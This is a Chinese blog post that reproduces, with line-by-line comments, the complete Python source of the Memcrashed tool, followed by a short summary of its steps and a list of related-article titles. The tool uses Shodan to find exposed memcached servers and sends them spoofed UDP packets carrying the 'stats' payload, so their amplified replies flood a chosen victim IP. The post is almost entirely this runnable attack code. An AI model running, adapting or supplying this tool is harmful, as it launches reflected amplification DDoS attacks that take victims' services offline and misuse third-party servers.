0x00前言:

距离世界上最大的Drdos攻击已经过去了两个星期左右

昨天在交流的时候。群友在Github中找到了exploit。

0x01开始:

#-- coding: utf8 --

#!/usr/bin/env python3

import sys, os, time, shodan #导入sys,shodan,os,time模块

from pathlib import Path #从pathlib模块中导入Path

from scapy.all import * #导入scapy

from contextlib import contextmanager, redirect_stdout #从contextlib模块中导入 contextmanager, redirect_stdout

starttime = time.time() #设置时间点

@contextmanager

def suppress_stdout():

    with open(os.devnull, "w") as devnull: #不同设备下的null路径

        with redirect_stdout(devnull):

            yield 

class color:

    HEADER = '\033[0m' #背景颜色字符串

keys = Path("./api.txt") #搜索API.txt

logo = color.HEADER + ''' #好看的标题

   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗

   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗

   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║

   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║

   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝

   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝

                                        Author: @037

                                        Version: 3.2

####################################### DISCLAIMER ########################################

| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |

| memcached servers. It then allows you to use the same servers to launch widespread      |

| distributed denial of service attacks by forging UDP packets sourced to your victim.    |

| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |

| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |

| I am NOT responsible for any damages caused or any crimes committed by using this tool. |

###########################################################################################

'''

print(logo) #输出好看的标题 = =

if keys.is_file(): #如果路径下有这个文件的话

    with open('api.txt', 'r') as file: #读取API.txt

        SHODAN_API_KEY=file.readline().rstrip('\n') #每行读取删除换行符

else: #如果没有这个文件

    file = open('api.txt', 'w') #新建API.txt

    SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') #等待用户输入

    file.write(SHODAN_API_KEY) #写入用户输入的东西

    print('[~] File written: ./api.txt') #这个就不说了 = =

    file.close() #关闭文件

while True:

    api = shodan.Shodan(SHODAN_API_KEY) #你的shodan Key

    print('') #= =

    try:

        myresults = Path("./bots.txt") #搜索bots.txt

        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower() #等待用户输入,将输入转化为小写

        if query.startswith('y'): #如果用户输入的是y

            print('')

            print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)

            results = api.search('product:"Memcached" port:11211') #从shodan中搜索Memcached服务,并且端口是11211的

            print('[✓] API Key Authentication: SUCCESS')

            print('[~] Number of bots: %s' % results['total'])

            print('')

            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower() #等待用户输入,将输入转化为小写

            if saveresult.startswith('y'): #如果是y

                file2 = open('bots.txt', 'a') #打开bots.txt

                for result in results['matches']: #变量shodan搜索到的结果

                    file2.write(result['ip_str'] + "\n") #将搜索到的IP写入bots.txt

                print('[~] File written: ./bots.txt')

                print('')

                file2.close() #关闭文件

        saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower() #等待用户输入将输入的转为小写

        if myresults.is_file(): #如果路径下有bots.txt

            if saveme.startswith('y'): #用户输入为y

                with open('bots.txt') as my_file: #读取bots.txt

                    ip_array = [line.rstrip() for line in my_file] #读取IP

        else: #如果路径下没有这个txt

            print('')

            print('[✘] Error: No bots stored locally, bots.txt file not found!')

            print('')

        if saveme.startswith('y') or query.startswith('y'): #两个任意一个为y的话

            print('')

            target = input("[▸] Enter target IP address: ") #等待用户输入

            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")

            data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"

            print('')

            if query.startswith('y'): #如果输入为y的话

                iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower() #等待输入

                if iplist.startswith('y'): #输入为y的话

                    print('')

                    counter= int(0)

                    for result in results['matches']: #遍历shodan搜索的结果

                        host = api.host('%s' % result['ip_str']) #输入IP

                        counter=counter+1

                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))

                        time.sleep(1.1 - ((time.time() - starttime) % 1.1))

            if saveme.startswith('y'): #为y的话

                iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower() #等待输入

                if iplistlocal.startswith('y'): #输入为y的话

                    print('')

                    counter= int(0)

                    for x in ip_array:

                        host = api.host('%s' % x)

                        counter=counter+1

                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))

                        time.sleep(1.1 - ((time.time() - starttime) % 1.1)) #延迟一秒钟,并减去开始的时间

            print('')

            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower() #等待用户输入

            if engage.startswith('y'): #如果为y

                if saveme.startswith('y'): #如果为y

                    for i in ip_array: #遍历ip_array

                        if power>1: #如果power大于1

                            print('[+] Sending %d forged UDP packets to: %s' % (power, i))

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)

                        elif power==1:#如果power等于1

                            print('[+] Sending 1 forged UDP packet to: %s' % i)

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP向Memcrashed发送数据

                else: #如果两个都不是

                    for result in results['matches']:

                        if power>1: #如果power大于1

                            print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据

                        elif power==1: #如果power等于1

                            print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])

                            with suppress_stdout():

                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) #伪造自己的源IP发送数据

                print('')

                print('[•] Task complete! Exiting Platform. Have a wonderful day.')

                break

            else:

                print('')

                print('[✘] Error: %s not engaged!' % target)

                print('[~] Restarting Platform! Please wait.')

                print('')

        else:

            print('')

            print('[✘] Error: No bots stored locally or remotely on Shodan!')

            print('[~] Restarting Platform! Please wait.')

            print('')

    except shodan.APIError as e:

            print('[✘] Error: %s' % e)

            option = input('[*] Would you like to change API Key? <Y/n>: ').lower() #等待输入

            if option.startswith('y'): #如果为y

                file = open('api.txt', 'w') #新建api.txt

                SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') #输入您的shodan可以

                file.write(SHODAN_API_KEY) #加入到文件

                print('[~] File written: ./api.txt')

                file.close() #关闭文件

                print('[~] Restarting Platform! Please wait.')

                print('')

            else: #如果不是

                print('')

                print('[•] Exiting Platform. Have a wonderful day.')

                break

向Memcrashed发送的数据: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

Memcrashed exploit地址:https://github.com/649/Memcrashed-DDoS-Exploit

0x02分析完代码获取到的思路:

1.从shodan中获取开放了11211的Memcrashed的服务的IP

2.遍历shodana获取到的IP写入到文件

3.遍历写人IP的文件

4.伪造源IP向遍历的IP发送数据:\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

审核Memcrashed Drdos攻击代码的更多相关文章

  1. 关于Memcached反射型DRDoS攻击分析

    一.Memcached反射攻击原理 1.反射DRDoS攻击: DRDoS攻击时DoS攻击的一种,DoS是指通过发送或引发大量的资源消耗导致服务不可用的一种攻击方式,中文称之为拒绝服务攻击.DRDoS是 ...

  2. 判断字符串中是否有SQL攻击代码

    判断一个输入框中是否有SQL攻击代码 public const string SQLSTR2 = @"exec|cast|convert|set|insert|select|delete|u ...

  3. PHP防CC攻击代码

    PHP防CC攻击代码: empty($_SERVER['HTTP_VIA']) or exit('Access Denied'); //代理IP直接退出 session_start(); $secon ...

  4. ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl 漏洞及攻击代码分析

    攻击代码网址:http://www.exploit-db.com/exploits/394/ 1.执行环境: 1.ProFTPD 1.3.0/1.3.0a 2.编译ProFTPD时.--enable- ...

  5. DOS、DOS攻击、DDOS攻击、DRDOS攻击

    https://baike.baidu.com/item/dos%E6%94%BB%E5%87%BB/3792374?fr=aladdin DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称 ...

  6. 常见的XSS攻击代码

    第一类: <tag on*=*/> 在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用. eg: 1.使html元素占据整个显示页面 ...

  7. mysql相关攻击代码收集

    1.批处理文件内容 @echo off net user li /add net user li /active:yes net localgroup Administrators li /add 2 ...

  8. php--防止DDos攻击代码

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

  9. PHP攻击网站防御代码-以及攻击代码反译

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

随机推荐

  1. Log4j2配置文件详解

    目录[-] 1 系列目录 2 默认配置 3 第一个配置例子 4 复杂一点的配置 4.1 Appender之Syslog配置 4.2 Syslog及Syslog-ng相关配置(Fedora) 5 Log ...

  2. c的文件流读取

    strtok(数组,分隔符); atof(数组)返回值为转换后的数字; fgets(数组指针,长度,文件句柄); 整整花了两天啊

  3. Yii2整合AdminLTE后台主题

    首先你要确保你已经安装好了Yii2 advanced高级模板,并且跑的通. 安装AdminLTE其实没有网上说的那么简单,网上千篇一律的推荐Composer安装,虽然Composer很方便,但是在中国 ...

  4. MysqL自动提交机制的关闭

    MysqL在执行一句数据库操作命令的时候,通常都是自动提交的.常用引擎下有两种,分别是MyIsam和InnoDB,MyIsam是不支持事务处理的,但InnoDB支持,但InnoDB在不开启事务处理的情 ...

  5. Codeforces446C - DZY Loves Fibonacci Numbers

    Portal Description 给出一个\(n(n\leq3\times10^5)\)个数的序列,进行\(m(m\leq3\times10^5)\)次操作,操作有两种: 给区间\([L,R]\) ...

  6. 【2016北京集训测试赛(十六)】 River (最大流)

    Description  Special Judge Hint 注意是全程不能经过两个相同的景点,并且一天的开始和结束不能用同样的交通方式. 题解 题目大意:给定两组点,每组有$n$个点,有若干条跨组 ...

  7. TCP/IP协议学习和理解

    TCP:Transmission Control Protocol-传输控制协议 IP:Internet Protocol-网络协议 TCP/IP 不是一个协议,而是一个协议族的统称,里面包括了 IP ...

  8. Android开发之组件

    Android应用程序由组件组成,组件是可以解决被调用的基本功能模块.Android系统利用组件实现程序内部或程序间的模块调用,以解决代码复用问题,这是Android系统非常重要的特性.在程序设计时, ...

  9. Ubuntu 卸载cario-dock

    偶然间听说别人用dock 可以把ubuntu美化,结果就装了个cairo-dock .结果是苹果mac的风格.不是很喜欢.于是就卸载,卸载过程中.发行卸载不掉. 尝试了很多方法. sudo apt-g ...

  10. PLSQL Developer报错(一)

    PLSQL Developer报错(一) 今天,我遇到了一个奇怪的问题,PLSQL Developer连接不上数据库,而且配置和数据库用户名密码都正确. 查找了半天的资料,也没有发现什么解决的办法.实 ...